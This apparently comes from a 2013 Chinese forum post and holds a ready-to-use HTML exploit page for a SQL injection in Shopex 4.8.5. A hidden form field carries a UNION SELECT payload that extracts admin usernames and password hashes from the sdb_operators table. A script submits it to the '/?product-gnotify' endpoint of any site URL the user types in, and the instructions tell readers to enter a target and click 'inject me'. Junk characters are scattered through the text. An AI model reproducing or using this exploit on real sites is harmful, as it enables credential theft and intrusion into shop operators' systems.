<center>
0 C. A( V& V" Q |9 }<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
: a; ]4 ?4 f4 `" f8 U) P<form action="" method="post" name="submit_url">: m& d9 k# f8 E) ?# [9 s
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>7 I. y; T+ {; e) a
<input type="hidden" name="goods[goods_id]" value="3">
" g1 w( h9 Y5 x% E2 z* ^<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">, e7 [2 P5 b0 g) s" E
<input type="submit" value="给我注入" onclick=fsubmit()>. B/ E! _ W" T, C3 H: Q
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com9 h" d5 j( k' K# p* {
" T& l! m; p) b/ f<script> : o0 O0 F' S2 H* r m
function fsubmit(){ 1 V! p# f, X9 e/ l9 `3 y# p
form = document.forms[0];
* U, w/ \( M0 Tform.action = form.url.value+'/?product-gnotify';
9 D8 N' v& l: k1 _ k) Rform.submit(); ) C& W5 |# F. |6 p. J1 _9 s) I) N
}
9 M; u7 Q7 t& E t5 W</script>
- c. |" P' D& v5 g* f6 {0 ~ |
发表于 2013-1-23 09:20:52
收藏
支持
反对